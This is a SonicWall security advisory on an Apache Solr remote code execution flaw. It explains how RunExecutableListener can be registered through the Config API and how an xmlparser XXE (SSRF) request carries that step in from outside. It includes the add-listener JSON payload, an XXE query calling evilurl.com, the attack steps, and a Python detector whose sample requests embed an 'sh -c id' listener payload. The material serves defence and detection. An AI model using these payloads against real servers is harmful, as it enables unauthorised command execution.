SonicWall Security Center


Apache Solr Remote Code Execution Vulnerability (Nov 1, 2017)



Description


Apache Solr is an open source distributed search platform built on the Apache Lucene search engine library. A remote code execution vulnerability has been reported in Apache Solr versions before 7.1. It allows an attacker to execute arbitrary commands on the server by sending crafted HTTP requests.

The code execution vulnerability

Solr uses the term "collection" to refer to a single search index, which is effectively a logical grouping of index data. Search queries are typically sent to Apache Solr as requests to the following URI:

http://<host>:8983/solr/<collection>/select?q=<query>

where <collection> is the name of the collection to query and <query> is a query in any supported query syntax. The request is sent over HTTP (GET or POST) and the query string is interpreted by a Lucene query parser.

Solr supports event listeners, which trigger actions on various events that occur on a collection (e.g. an update to the collection). An event listener requires an event type and a handler class. The handler class may be a custom class or a built-in one. Solr's built-in "RunExecutableListener" class executes a configured command on a given event, for example after each update is committed. The problem is that such a listener can be registered with arbitrary parameters simply by calling the Config API (http://<host>:8983/solr/<collection>/config) with the add-listener command:

POST /solr/newcollection/config HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json
Content-Length: 198

{
  "add-listener" : {
    "event":"postCommit",
    "name":"somelistener",
    "class":"solr.RunExecutableListener",
    "exe":"[command]",       <--- Arbitrary command (the executable to run)
    "dir":"solr/bin",        <--- Working directory the command is run in
    "args":["foo","bar"]     <--- Command arguments
  }
}

When the postCommit event fires (i.e. after an update to the collection is committed), the configured command is executed with the privileges of the Solr server process.

On its own, the vulnerability described above requires access to the Solr Config API and is therefore sufficient for a local privilege escalation attack. To exploit it without direct access to the Solr server, a second vulnerability can be chained with it: the XML external entity (XXE) expansion vulnerability.

The XML external entity expansion vulnerability

This vulnerability is caused by the Lucene XML query parser (reachable through the xmlparser query parser) not prohibiting DOCTYPE declarations or the expansion of external entities. A query can be crafted that causes Solr to make requests to localhost (or to any other host reachable from the server) when it attempts to resolve the external entity, resulting in a server-side request forgery (SSRF).

For example, when Apache Solr handles the following request, it makes an HTTP GET request to evilurl.com while trying to resolve the DOCTYPE:

http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://evilurl.com"><a></a>'}

Combined with the XXE vulnerability, an attacker who cannot reach the Config API directly can make the Solr process send requests to its own localhost interface, turning the local code execution vulnerability into a remote code execution vulnerability.

A public exploit is already available on exploit-db. A real-world attack consists of the following steps:

  1. Create a new collection to be used in the attack, using the XXE vulnerability to make Solr call the collection-creation URL on localhost. (If a collection name is already known to the attacker, this step can be skipped.)
  2. Register the RunExecutableListener on that collection through the Config API. Because the Config API is not reached directly, the request is routed through a select request on localhost: the qt parameter points the request at the collection's /config handler with the JSON payload in stream.body, and the shards parameter makes the Solr node forward the request to itself:
     http://localhost:8983/solr/<collection>/select?q=foo&qt=/solr/newcollection/config?stream.body=<JSON payload>&shards=localhost:8983/
  3. Send an update to "newcollection" through the XXE vulnerability, using the same request format as in step 2, to trigger the postCommit event and with it the RunExecutableListener.
  4. The command contained in the JSON payload from step 2 is executed with the privileges of the Solr process.

SonicWall Threat Research team has analyzed the vulnerability and developed the following signatures:
  • IPS 13036: Apache Solr Remote Code Execution 1
  • IPS 13037: Apache Solr Remote Code Execution 2
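The following Python script is an added example; it is not SonicWall's signature logic, not code from the exploit-db entry and not part of the Solr project. It shows the detection logic a practitioner could run over captured HTTP requests to flag the patterns used in the attack chain above: a Config API add-listener command whose class is solr.RunExecutableListener (sent directly, or smuggled through the qt/stream.body/shards trick from step 2), a shards parameter pointing the node at its own loopback address, and an xmlparser query carrying a DOCTYPE with an external identifier. The sample requests, the stand-in command in the listener payload ("sh -c id" in place of the page's "[command]") and the indicator names are constructed for the example.

```python
"""Flag Solr requests matching the RunExecutableListener / xmlparser XXE chain.

Added example (not SonicWall signature logic, not Solr project code). It
inspects raw HTTP requests for the indicators described in the alert; the
sample requests below are constructed for the example.
"""
import json
import re
from urllib.parse import parse_qs, quote, urlsplit

RUN_EXEC_CLASS = "RunExecutableListener"
# A DOCTYPE with an external identifier is what makes the parser fetch a URL.
DOCTYPE_EXTERNAL = re.compile(r"<!DOCTYPE\b[^>]*\b(SYSTEM|PUBLIC)\b", re.IGNORECASE)
LOOPBACK_SHARD = re.compile(r"(localhost|127\.0\.0\.1)(:\d+)?/")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, query dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    method, target, _version = head.split("\r\n", 1)[0].split(" ", 2)
    url = urlsplit(target)
    return method, url.path, parse_qs(url.query, keep_blank_values=True), body


def run_executable_listener(text):
    """Return the add-listener command registering RunExecutableListener, else None."""
    try:
        doc = json.loads(text)
    except ValueError:
        return None
    if not isinstance(doc, dict):
        return None
    cmds = doc.get("add-listener")
    for cmd in cmds if isinstance(cmds, list) else [cmds]:
        if isinstance(cmd, dict) and RUN_EXEC_CLASS in str(cmd.get("class", "")):
            return cmd
    return None


def analyse(raw):
    """Return (indicator, detail) tuples found in one raw HTTP request."""
    _method, path, query, body = parse_request(raw)
    findings = []

    # 1a. Direct Config API call: JSON in the body or in stream.body.
    if path.endswith("/config"):
        for text in [body] + query.get("stream.body", []):
            cmd = run_executable_listener(text)
            if cmd:
                findings.append(("run-executable-listener", cmd.get("exe")))

    # 1b. Select request whose qt points at /config with stream.body, forwarded
    #     to the node itself via shards= (step 2 of the chain).
    for qt in query.get("qt", []):
        inner = urlsplit(qt)
        if inner.path.endswith("/config"):
            for text in parse_qs(inner.query).get("stream.body", []):
                cmd = run_executable_listener(text)
                if cmd:
                    findings.append(("run-executable-listener-via-qt", cmd.get("exe")))
    for shard in query.get("shards", []):
        if LOOPBACK_SHARD.match(shard):
            findings.append(("shards-loopback", shard))

    # 2. xmlparser query whose XML declares an external DOCTYPE (XXE -> SSRF).
    for q in query.get("q", []):
        uses_xmlparser = "{!xmlparser" in q or "xmlparser" in query.get("defType", [])
        match = DOCTYPE_EXTERNAL.search(q)
        if uses_xmlparser and match:
            findings.append(("xmlparser-external-doctype", match.group(1).upper()))
    return findings


# Constructed sample requests. The listener payload mirrors the alert's
# add-listener command, with "sh -c id" standing in for "[command]".
LISTENER_PAYLOAD = json.dumps({"add-listener": {
    "event": "postCommit", "name": "somelistener",
    "class": "solr.RunExecutableListener",
    "exe": "sh", "dir": "/bin", "args": ["-c", "id"]}})

SAMPLES = {
    "benign": ("GET /solr/gettingstarted/select?q=title%3Asolr&rows=10 HTTP/1.1\r\n"
               "Host: localhost:8983\r\n\r\n"),
    "config_post": ("POST /solr/newcollection/config HTTP/1.1\r\nHost: localhost:8983\r\n"
                    "Content-Type: application/json\r\n\r\n" + LISTENER_PAYLOAD),
    "qt_shards": ("GET /solr/newcollection/select?q=foo&qt="
                  + quote("/solr/newcollection/config?stream.body=" + LISTENER_PAYLOAD, safe="")
                  + "&shards=localhost:8983/ HTTP/1.1\r\nHost: localhost:8983\r\n\r\n"),
    "xxe": ("GET /solr/gettingstarted/select?q="
            + quote("{!xmlparser v='<!DOCTYPE a SYSTEM \"http://evilurl.com\"><a></a>'}", safe="")
            + " HTTP/1.1\r\nHost: localhost:8983\r\n\r\n"),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, analyse(raw))
```

The qt/shards check matters because the JSON never appears in a request to a /config path: it is carried as a query parameter of a select request, so a signature keyed only on the Config API URL misses step 2 of the chain. Likewise the DOCTYPE check is restricted to xmlparser queries, since a plain text query containing "<!DOCTYPE" is never handed to the XML parser.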



© 2017 SonicWall